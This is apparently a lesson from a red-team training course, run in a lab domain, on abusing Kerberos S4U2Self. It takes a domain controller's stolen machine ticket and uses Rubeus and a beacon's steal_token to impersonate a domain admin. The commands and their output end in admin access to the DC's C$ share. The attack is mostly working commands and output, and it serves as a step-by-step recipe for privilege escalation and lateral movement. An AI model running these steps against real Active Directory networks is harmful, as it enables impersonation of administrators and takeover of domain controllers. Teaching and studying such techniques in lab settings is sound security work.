As we saw in the previous two examples of constrained delegation, there are two S4U (Service for User) extensions. S4U2Self (Service for User to Self) and S4U2Proxy (Service for User to Proxy). S4U2Self allows a service to obtain a TGS to itself on behalf of a user, and S4U2Proxy allows the service to obtain a TGS on behalf of a user to a second service.
When we abused constrained delegation, we did: Rubeus s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$. From the output, we saw Rubeus first builds an S4U2Self request and obtains a TGS for nlamb to sql-2/dev.cyberbotic.io. It then builds an S4U2Proxy request to obtain a TGS for nlamb to cifs/dc-2.dev.cyberbotic.io.
This is obviously working by design because SQL-2 is specifically trusted for delegation to that service. However, there's another particularly useful way, published by Elad Shamir, to abuse the S4U2Self extension - and that is to gain access to a computer if we have its TGT.
In the Unconstrained Delegation module, we obtained a TGT for the domain controller. If you tried to pass that ticket into a logon session and use it to access the C$ share (like we would with a user TGT), it would fail.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:DC-2$ /password:FakePass /ticket:doIFuj[...]lDLklP
[*] Using DEV\DC-2$:FakePass
[*] Showing process : False
[*] Username : DC-2$
[*] Domain : DEV
[*] Password : FakePass
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2832
[+] Ticket successfully imported!
[+] LUID : 0x4d977f
beacon> steal_token 2832
beacon> ls \\dc-2.dev.cyberbotic.io\c$
[-] could not open \\dc-2.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
This is because machines do not get remote local admin access to themselves. What we can do instead is abuse S4U2Self to obtain a usable TGS as a user we know is a local admin (e.g. a domain admin). Rubeus has a /self flag for this purpose.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap
[*] Action: S4U
[*] Building S4U2self request for: 'DC-2$@DEV.CYBERBOTIC.IO'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2self request to 10.10.122.10:88
[+] S4U2self success!
[*] Substituting alternative service name 'cifs/dc-2.dev.cyberbotic.io'
[*] Got a TGS for 'nlamb' to 'cifs@DEV.CYBERBOTIC.IO'
[*] base64(ticket.kirbi):
doIFyD[...]MuaW8=
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=
[*] Using DEV\nlamb:FakePass
[*] Showing process : False
[*] Username : nlamb
[*] Domain : DEV
[*] Password : FakePass
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2664
[+] Ticket successfully imported!
[+] LUID : 0x4ff935
beacon> steal_token 2664
beacon> ls \\dc-2.dev.cyberbotic.io\c$
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 15:44:08 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 08/15/2022 16:09:55 inetpub
dir 05/08/2021 08:20:24 PerfLogs
dir 08/24/2022 10:51:51 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 09/05/2022 17:17:48 ProgramData
dir 08/15/2022 15:23:23 Recovery
dir 08/16/2022 12:37:38 Shares
dir 09/05/2022 12:03:43 System Volume Information
dir 08/15/2022 15:24:39 Users
dir 09/06/2022 15:21:25 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
1kb fil 08/15/2022 16:16:13 dc-2.dev.cyberbotic.io_sub-ca.req
12kb fil 09/05/2022 07:25:58 DumpStack.log
12kb fil 09/06/2022 09:04:41 DumpStack.log.tmp
384mb fil 09/06/2022 09:04:41 pagefile.sys